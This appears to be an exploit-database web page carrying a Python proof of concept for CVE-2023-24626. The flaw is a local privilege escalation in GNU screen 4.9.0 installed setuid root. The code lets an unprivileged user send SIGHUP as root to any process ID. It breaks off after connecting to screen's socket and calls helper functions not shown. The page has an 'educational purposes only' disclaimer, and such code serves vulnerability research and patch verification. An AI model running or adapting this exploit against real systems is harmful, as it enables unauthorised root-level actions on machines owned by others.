Gnu screen v4.9.0 privilege escalation Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-04-05 |
Type : local |
Platform : linux
This exploit / vulnerability Gnu screen v4.9.0 privilege escalation is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: GNU screen v4.9.0 - Privilege Escalation
# Date: 03.02.2023
# Exploit Author: Manuel Andreas
# Vendor Homepage: https://www.gnu.org/software/screen/
# Software Link: https://ftp.gnu.org/gnu/screen/screen-4.9.0.tar.gz
# Version: 4.9.0
# Tested on: Arch Linux
# CVE : CVE-2023-24626
import os
import socket
import struct
import argparse
import subprocess
import pty
import time
def main():
parser = argparse.ArgumentParser(description='PoC for sending SIGHUP as root utilizing GNU screen configured as setuid root.')
parser.add_argument('pid', type=int, help='the pid to receive the signal')
args = parser.parse_args()
pid = args.pid
username = os.getlogin()
screen = spawn_screen_instance()
print("Waiting a second for screen to setup its socket..")
time.sleep(1)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
socket_path = find_latest_socket(SOCKDIR_TEMPLATE.format(username))
print(f"Connecting to: {socket_path}")
s.connect(socket_path)